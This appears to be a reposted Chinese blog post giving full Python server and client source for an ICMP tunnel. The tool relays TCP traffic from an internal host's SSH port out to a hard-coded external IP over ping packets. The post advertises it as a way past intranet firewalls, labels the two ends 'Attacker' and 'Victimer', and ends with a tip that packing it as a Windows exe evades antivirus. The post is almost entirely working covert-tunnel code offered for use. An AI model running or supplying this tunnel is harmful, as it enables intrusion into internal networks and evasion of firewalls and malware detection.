ICMP隧道之端口转发(Python)

反弹式端口映射 一定程度上可穿透内网防火墙

Server:

__author__ = 'T3rry'

import os
import md5 
import sys
import time
import Queue
import random
import select
import socket
import struct
import threading

gSOCKETID=[]
gCLIENTOBJ=[]
ICMPSOCK=None

VER='\x01\x01'
HANDSHAKE='HELLO'
FUNCTION={'CMDSHELL','FORWARD','SOCKS5'}

class IcmpSocket():
    def __init__(self,MODE):
        self.ICMP_ECHO_REQUEST = 0x08 
        self.ICMP_ECHO_REPLY= 0x00
        if (MODE==0):
            self.ICMP_SEND=self.ICMP_ECHO_REPLY
            self.ICMP_RECV=self.ICMP_ECHO_REQUEST
            self.ICMP_CODE= 0x00
        else:
            self.ICMP_RECV=self.ICMP_ECHO_REPLY
            self.ICMP_SEND=self.ICMP_ECHO_REQUEST
            self.ICMP_CODE= 0x00

        self.MAX_DATA_SIZE=1024
        self.TIMEOUT=300
        self.ID=0x100
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_RAW,socket.getprotobyname("icmp"))

    def bind(self,address):
        self.sock.bind((address,0))
        #self.sock.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
        return IcmpSocket

    def checksum(self,source_string):
        sum = 0
        count_to = (len(source_string) / 2) * 2
        for count in xrange(0, count_to, 2):
            this = ord(source_string[count + 1]) * 256 + ord(source_string[count])
            sum = sum + this
            sum = sum & 0xffffffff 

        if count_to < len(source_string):
            sum = sum + ord(source_string[len(source_string) - 1])
            sum = sum & 0xffffffff 

        sum = (sum >> 16) + (sum & 0xffff)
        sum = sum + (sum >> 16)
        answer = ~sum
        answer = answer & 0xffff
        answer = answer >> 8 | (answer << 8 & 0xff00)

        return answer

    def recv(self,buffsize):
        time_left = self.TIMEOUT
        while True:
            started_select = time.time()
            what_ready = select.select([self.sock], [], [], time_left)
            how_long_in_select = (time.time() - started_select)
            if what_ready[0] == []: 
                return
            time_received = time.time()
            packet, addr = self.sock.recvfrom(buffsize+28)
            icmpHeader = packet[20:28]
            type, code, checksum, packetID, sequence = struct.unpack(
            "bbHHh", icmpHeader
                )
            if type == self.ICMP_RECV and code==self.ICMP_CODE:
                return packet[28:],packetID,sequence,addr
            time_left = time_left - how_long_in_select
            if time_left <= 0:
                return

    def send(self, dest_addr,data,packetID,sequence):
        dest_addr  =  socket.gethostbyname(dest_addr)
        my_checksum = 0
        header = struct.pack("bbHHh", self.ICMP_SEND, self.ICMP_CODE, my_checksum, packetID, sequence)
        my_checksum = self.checksum(header + data)
        header = struct.pack(
            "bbHHh",  self.ICMP_SEND, self.ICMP_CODE, socket.htons(my_checksum), packetID, sequence
        )
        packet = header + data
        self.sock.sendto(packet, (dest_addr, 1))
       
    def PrintData(self,buf):
        print "Data:"
        for b in buf:
            print hex(ord(b)),
            
def _GetSockNum():
    while(True):
        id=random.randint(10000, 32767)
        if(id not in gSOCKETID):
            break
    return id
    
def _GetMd5(src):
        m = md5.new()  
        m.update(src)   
        return m.hexdigest()
        
def _TransData(ss,obj):
    Timeout=3
    startTime=0
    while(True):
        try:
            if(startTime==0):
                startTime = time.time()
            elif(time.time()-startTime>Timeout):
                return 0
                
            r, w, e = select.select([ss], [], [ss],0.2)
            if ss in r:
                try:
                    recv=ss.recv(1024)
                    print "TCP: Recv <",len(recv),">bytes"
                    if(len(recv)>0):
                        obj['OutQueue'].put(recv)
                        print "ICMP: Send <",len(recv),">bytes"
                    else:
                        print "Attacker is offline"
                        obj['OutQueue'].put(obj['CloseTCPFlag'])
                        ss.close()
                        return -1
                except Exception as e:
                    print(e),sys._getframe().f_lineno
                    obj['OutQueue'].put(obj['CloseTCPFlag'])
                    return -1
                    
            elif (obj['InQueue'].empty()==False):
                data=''
                startTime=0
                while(obj['InQueue'].qsize()>0):
                    recv =obj['InQueue'].get()
                    if(recv==obj['CloseTCPFlag']):
                        ss.close()
                        return -1
                    if(recv!=obj['HeartBeatFlag']):
                        data =data+recv
                        print "ICMP: Recv <",len(data),">bytes"
                    if(obj['CanSend']):
                            if(len(data)>0):
                                ss.send(data)
                                print "Tcp: Send <",len(data),">bytes"
                            obj['CanSend']==False
                            data=''
                       
        except Exception as e:
            print e,sys._getframe().f_lineno
            break
def PrintHex(buf):
        print "Data:"
        for b in buf:
            print hex(ord(b)),

def _ProcessNewClient(obj,addr):
    rs= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    rs.bind(('0.0.0.0',0))
    rs.listen(10)
    socks=[]
    socks.append(rs)
    ip,sp=rs.getsockname()
    obj['OutQueue'].put("\x01\x00")
    print ("Your server port is :"+str(sp))
    #obj['OutQueue'].put("Your server port is :"+str(sp))
    ExitCode=1
    while(ExitCode):
        try:
            r, w, e = select.select(socks, [], socks)
            if(rs in r):
                ss,laddr=rs.accept()
                print "Attacker ip from "+str(laddr[0])+" is Connected!"
                obj['OutQueue'].put("\x00\x00")
                #print "Send authenticate info "
            elif (e.count>0):
                break
        except Exception as e:
                print "Tunnel has been closed",e
                break

        print "Now starting translate data..."
        ExitCode= _TransData(ss,obj)
        
    gSOCKETID.remove(obj['Num'])
    gCLIENTOBJ.remove(obj)
    print "Translate data is over..."
    
def _ForwardData():
    while(True):
        for obj in gCLIENTOBJ:
            if(obj['OutQueue'].empty()==False):
                recv=obj['OutQueue'].get()
                ICMPSOCK.send(obj['Address'],recv,obj['Identifier'],obj['Num'])

def _DataCenter():
    td= threading.Thread(target=_ForwardData)
    td.start()
    while(True):
        try:
            data,id,seq,addr=ICMPSOCK.recv(1024)
            if(seq==0 and data[0:7]=='\x01\x01'+HANDSHAKE):
                sockNum=_GetSockNum()
                gSOCKETID.append(sockNum)
                obj={'Num':sockNum,'InQueue':Queue.Queue(),'OutQueue':Queue.Queue(),'Address':addr[0],'Identifier':id,'CanSend':False,'HeartBeatFlag':_GetMd5(str(sockNum)+'TS'),'CloseTCPFlag':_GetMd5(str(sockNum)+'TCP') }
                obj['Identifier']=id
                gCLIENTOBJ.append(obj)
                print "Accpet new client from :",sockNum,addr[0]
                t= threading.Thread(target=_ProcessNewClient, args=(obj,addr[0]))
                t.start()
            elif seq in gSOCKETID:
                for obj in gCLIENTOBJ:
                    if(obj['Num']==seq and obj['Address']==addr[0]):
                        obj['Identifier'] = id
                        obj['CanSend']    = True
                        obj['InQueue'].put(data)
        except Exception as e:
            print e

def _StartServer(lip,Mode):
    global ICMPSOCK
    ICMPSOCK=IcmpSocket(Mode)   #0 Server Mode
    ICMPSOCK.bind(lip)
    _DataCenter()

if __name__ == '__main__':
    _StartServer('0.0.0.0',0)
Client:

__author__ = 'T3rry'

import os
import sys
import md5
import time 
import select
import socket
import struct

VER='\x01\x01'
SEQUENCE=0
HANDSHAKE='HELLO'
HEARTBEATFLAG=''
CLOSETCPFLAG=''
FUNCTION={'CMDSHELL','FORWARD','SOCKS5'}

class IcmpSocket():
    def __init__(self,MODE):
        self.ICMP_ECHO_REQUEST = 0x08 
        self.ICMP_ECHO_REPLY= 0x00
        if (MODE==0):
            self.ICMP_SEND=self.ICMP_ECHO_REPLY
            self.ICMP_RECV=self.ICMP_ECHO_REQUEST
            self.ICMP_CODE=0x00
        else:
            self.ICMP_RECV=self.ICMP_ECHO_REPLY
            self.ICMP_SEND=self.ICMP_ECHO_REQUEST
            self.ICMP_CODE=0x00
            
        self.MAX_DATA_SIZE=1024
        self.TIMEOUT=300
        self.ID=0x100
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_RAW,socket.getprotobyname("icmp"))
        
    def bind(self,address):
        self.sock.bind((address,0))
        #self.sock.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
        return IcmpSocket
    
    def checksum(self,source_string):
        sum = 0
        count_to = (len(source_string) / 2) * 2
        for count in xrange(0, count_to, 2):
            this = ord(source_string[count + 1]) * 256 + ord(source_string[count])
            sum = sum + this
            sum = sum & 0xffffffff 

        if count_to < len(source_string):
            sum = sum + ord(source_string[len(source_string) - 1])
            sum = sum & 0xffffffff 

        sum = (sum >> 16) + (sum & 0xffff)
        sum = sum + (sum >> 16)
        answer = ~sum
        answer = answer & 0xffff
        answer = answer >> 8 | (answer << 8 & 0xff00)

        return answer

    def recv(self,buffsize):
        time_left = self.TIMEOUT
        while True:
            started_select = time.time()
            what_ready = select.select([self.sock], [], [], time_left)
            how_long_in_select = (time.time() - started_select)
            if what_ready[0] == []: 
                return

            time_received = time.time()
            packet, addr = self.sock.recvfrom(buffsize+28)
            icmpHeader = packet[20:28]
            type, code, checksum, packetID, sequence = struct.unpack(
            "bbHHh", icmpHeader 
                )
            if type == self.ICMP_RECV and code==self.ICMP_CODE:
                return packet[28:],packetID,sequence,addr

            time_left = time_left - how_long_in_select
            if time_left <= 0:
                return

    def send(self, dest_addr,data,packetID,sequence):
        dest_addr  =  socket.gethostbyname(dest_addr)
        my_checksum = 0
        header = struct.pack("bbHHh", self.ICMP_SEND, self.ICMP_CODE, my_checksum, packetID, sequence)
        my_checksum = self.checksum(header + data)
        header = struct.pack(
            "bbHHh",  self.ICMP_SEND, self.ICMP_CODE, socket.htons(my_checksum), packetID, sequence
        )
        packet = header + data
        self.sock.sendto(packet, (dest_addr, 1))
def GetMd5(src):
        m = md5.new()  
        m.update(src)   
        return m.hexdigest()
def PrintHex(buf):
        print "Data:"
        for b in buf:
            print hex(ord(b)),

def SendAuthInfo(icmpsock,rip):
     icmpsock.send(rip,VER+len(USERNAME)+USERNAME+len(PASSWORD)+PASSWORD,icmpsock.ID,SEQUENCE)
     
def _TransData(ss,icmpsock,rip):
    socks=[]
    socks.append(ss)
    socks.append(icmpsock.sock)
    while(True):
        try:
            r, w, e = select.select(socks, [], socks,0.2)
            if ss in r:
                try:
                    recv=ss.recv(1024)
                    print "TCP Recv: <",len(recv),"> bytes"
                    if(len(recv)>0):
                        icmpsock.send(rip,recv,icmpsock.ID,SEQUENCE)
                        print "ICMP Send: <",len(recv),"> bytes"
                    else:
                        print "Attacker is offline"
                        icmpsock.send(rip,CLOSETCPFLAG,icmpsock.ID,SEQUENCE)
                        ss.close()
                        return -1
                except Exception as e:
                    print(e),sys._getframe().f_lineno
                    return -1
            elif (icmpsock.sock) in r:
                recv,id,seq,addr=icmpsock.recv(1024)               
                if(recv==CLOSETCPFLAG):
                    print "Victimer is offline"
                    ss.close()
                    return -1 
                else:
                    print "ICMP Recv: <",len(recv),"> bytes"
                    ss.send(recv)
                    print "TCP Send: <",len(recv),"> bytes"
            else:
                icmpsock.send(rip,HEARTBEATFLAG,icmpsock.ID,SEQUENCE)
        except Exception as e:
            print e,sys._getframe().f_lineno
            return -1
            
def _StartConnect(rip,mode,tip,tport):
    global SEQUENCE
    global HEARTBEATFLAG
    global CLOSETCPFLAG
    
    icmpsock=IcmpSocket(mode)   #1 Client Mode
    icmpsock.bind('0.0.0.0')
    icmpsock.send(rip,VER+HANDSHAKE,icmpsock.ID,SEQUENCE)
    data,id,seq,addr=icmpsock.recv(2)
    PrintHex(data)
    ExitCode=1
    if( seq!=0):
        SEQUENCE=seq
        HEARTBEATFLAG=GetMd5(str(seq)+'TS')
        CLOSETCPFLAG =GetMd5(str(seq)+'TCP')
        if(ord(data[0])==1 and ord(data[1])==0) :
            while(ExitCode):
                data,id,seq,addr=icmpsock.recv(2)
                PrintHex(data)
                if(ord(data[0])==0 and ord(data[1])==0):
                    cs= socket.socket(socket.AF_INET, socket.SOCK_STREAM)                
                    cs.connect((tip,tport))
                    print "Connecting to  target's host Succ"
                    ExitCode= _TransData(cs,icmpsock,rip)
            
if __name__ == '__main__':
    _StartConnect('122.32.67.123',1,'192.168.10.130',22)


Tip:Windows 下可将py文件转成exe   缺点:体积变大了  优点:有免杀效果

ICMP隧道之端口转发(Python)_第1张图片

你可能感兴趣的:(Security,Python,TCP/IP,LINUX/UNIX)